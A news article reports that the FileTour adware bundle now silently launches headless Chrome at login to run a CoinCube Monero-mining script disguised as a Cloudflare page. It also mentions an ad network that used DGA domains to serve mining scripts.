An adware bundle has been discovered which installs software to mine cryptocurrency on user PCs without their consent.
Analysts from Bleeping Computer say that an adware bundle called FileTour has often walked a tightrope between nuisanceware, adware, and potentially unwanted programs (PuP), but now, the package has gone further by jumping on the cryptojacking bandwagon.
FileTour, believed to be of Russian origin, is a Windows executable which is often bundled with other downloads including software cracks and key generators.
Now, FileTour has introduced a new component which steals user processing power for the purpose of mining for cryptocurrency.
Known as cryptojacking, this practice involves the use of often-legitimate mining scripts which are deployed on browsers without user consent, before funneling the proceeds to mining pools controlled by threat actors.
According to the publication, the bundle creates a Windows autorun which launches the Google Chrome browser — in a way which is invisible. By using specific code to launch the browser, the software forces Chrome to launch in an invisible, headless state.
The browser then connects to a mining page whenever the user logs into Windows. This page launches the CoinCube mining script that steals processing power to mine Monero.
CPU usage may spike to up to 80 percent, and while victims may notice their PCs are slow, it could be a very long time before the software is uncovered and removed — or users may simply blame Chrome as the oddity.
The researcher opened the website page responsible for the script in a standard browser window and came across an interesting element of the script; the page masquerades as a Cloudflare anti-DDoS page.
We are likely to see more and more use cases of cryptojacking. The technique is already becoming common in attacks against enterprise cloud environments, websites are being compromised by mining scripts, and social engineering campaigns are hitting networks with the only aim of infiltrating PCs for cryptojacking.
In an interesting case of adware and cryptocurrency mining colliding this March, cybersecurity researchers from Netlab 306 uncovered an advertising network which was able to bypass ad blockers in order to serve cryptojacking scripts.
The company used domain DGA technology to generate random domain addresses to circumvent ad blockers, but then went further by using this technique to deploy cryptocurrency mining scripts. Websites connected to the ad network would unwittingly serve the scripts, which stole visitor CPU power to mine Monero.